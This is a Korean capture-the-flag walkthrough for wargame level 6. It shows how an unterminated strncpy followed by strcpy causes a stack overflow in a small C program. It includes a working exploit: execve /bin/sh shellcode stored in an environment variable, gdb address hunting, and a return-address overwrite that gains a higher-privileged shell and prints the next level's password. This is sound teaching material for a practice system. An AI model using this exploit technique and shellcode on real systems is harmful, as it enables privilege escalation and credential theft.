Level 6 문제 소스는 아래와 같다.
#include<string.h>
// The devil is in the details - nnp
void copy_buffers(char *argv[])
{
char buf1[32], buf2[32], buf3[32];
strncpy(buf2, argv[1], 31);
strncpy(buf3, argv[2], sizeof(buf3));
strcpy(buf1, buf3);
}
int main(int argc, char *argv[])
{
copy_buffers(argv);
return 0;
}
특별히 오버플로우가 날거 같은 부분이 보이지 않는다. 하지만 아래와 같이 입력을 하면 세그먼트폴트가 발생한다.
level6@io:/tmp/by6$ /levels/level06 `python -c "print 'A'*10 + ' ' + 'B'*31"`
level6@io:/tmp/by6$ /levels/level06 `python -c "print 'A'*10 + ' ' + 'B'*32"`
Segmentation fault
level6@io:/tmp/by6$
어떻게 오버플로우가 발생하는지 아래와 같이 코드를 수정하여 확인해 보도록 하자.
#include<string.h>
// The devil is in the details - nnp
void copy_buffers(char *argv[])
{
char buf1[32], buf2[32], buf3[32];
strncpy(buf2, argv[1], 31);
printf("%s\n", buf2);
strncpy(buf3, argv[2], sizeof(buf3));
printf("%s\n", buf3);
strcpy(buf1, buf3);
printf("%s\n", buf1);
}
int main(int argc, char *argv[])
{
copy_buffers(argv);
return 0;
}
level6@io:/tmp/by6$ ./a.out `python -c "print 'A'*10 + ' ' + 'B'*31"`
AAAAAAAAAA
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
level6@io:/tmp/by6$ ./a.out `python -c "print 'A'*10 + ' ' + 'B'*32"`
AAAAAAAAAA
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAA
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAA
Segmentation fault
level6@io:/tmp/by6$
buf3의 변수에 값을 입력하는 과정에서 오버플로우가 나 buf2의 값이 같이 입력되는걸 볼 수 있었다.
그럼 이제 buf2에는 우리가 원하는 주소를 넣고 buf3를 오버 플로우 시키면 될 것으로 보인다. 공격을 해보자.
level6@io:/tmp/by6$ export SHELLCODE=`python -c "print '\x90'*100 + '\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80'"`
level6@io:/tmp/by6$ gdb /levels/level06
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) b main
Breakpoint 1 at 0x80483fa
(gdb) r
Starting program: /levels/level06
Breakpoint 1, 0x080483fa in main ()
(gdb) x/32wx $esp
0xbfffdca4: 0xbfffdcc0 0xbfffdd18 0x0094f455 0x08048470
0xbfffdcb4: 0x080482f0 0xbfffdd18 0x0094f455 0x00000001
0xbfffdcc4: 0xbfffdd44 0xbfffdd4c 0x0052db18 0x00000001
0xbfffdcd4: 0x00000001 0x00000000 0x0804820c 0x00a72ff4
0xbfffdce4: 0x08048470 0x080482f0 0xbfffdd18 0xebb98081
0xbfffdcf4: 0x3de835ff 0x00000000 0x00000000 0x00000000
0xbfffdd04: 0x0069f2e0 0x0094f37d 0x006a6ff4 0x00000001
0xbfffdd14: 0x080482f0 0x00000000 0x08048311 0x080483ec
(gdb)
0xbfffdd24: 0x00000001 0xbfffdd44 0x08048470 0x08048420
0xbfffdd34: 0x0069a250 0xbfffdd3c 0x006a4ae5 0x00000001
0xbfffdd44: 0xbfffde22 0x00000000 0xbfffde32 0xbfffdebf
0xbfffdd54: 0xbfffdecf 0xbfffdeda 0xbfffdefc 0xbfffdf10
0xbfffdd64: 0xbfffdf1c 0xbfffdf28 0xbfffdf55 0xbfffdf6b
0xbfffdd74: 0xbfffdf7a 0xbfffdf87 0xbfffdf90 0xbfffdfa2
0xbfffdd84: 0xbfffdfaa 0xbfffdfb9 0x00000000 0x00000010
0xbfffdd94: 0xbfebfbff 0x00000006 0x00001000 0x00000011
(gdb)
0xbfffdda4: 0x00000064 0x00000003 0x08048034 0x00000004
0xbfffddb4: 0x00000020 0x00000005 0x00000007 0x00000007
0xbfffddc4: 0x0068c000 0x00000008 0x00000000 0x00000009
0xbfffddd4: 0x080482f0 0x0000000b 0x000003ee 0x0000000c
0xbfffdde4: 0x000003ee 0x0000000d 0x000003ee 0x0000000e
0xbfffddf4: 0x000003ee 0x00000017 0x00000000 0x0000000f
0xbfffde04: 0xbfffde1b 0x00000000 0x00000000 0x00000000
0xbfffde14: 0x00000000 0x69000000 0x00363836 0x6c2f0000
(gdb)
0xbfffde24: 0x6c657665 0x656c2f73 0x306c6576 0x48530036
0xbfffde34: 0x434c4c45 0x3d45444f 0x90909090 0x90909090
0xbfffde44: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde54: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde64: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde74: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde84: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde94: 0x90909090 0x90909090 0x90909090 0x3158176a
(gdb) q
The program is running. Exit anyway? (y or n) y
level6@io:/tmp/by6$ /levels/level06 `python -c "print '\x94\xde\xff\xbf'*2 + ' ' + 'B'*32"`
sh-3.2$ id
uid=1006(level6) gid=1006(level6) euid=1007(level7) groups=1006(level6),1029(nosu)
sh-3.2$ cat /home/level7/.pass
qpapbi2w
sh-3.2$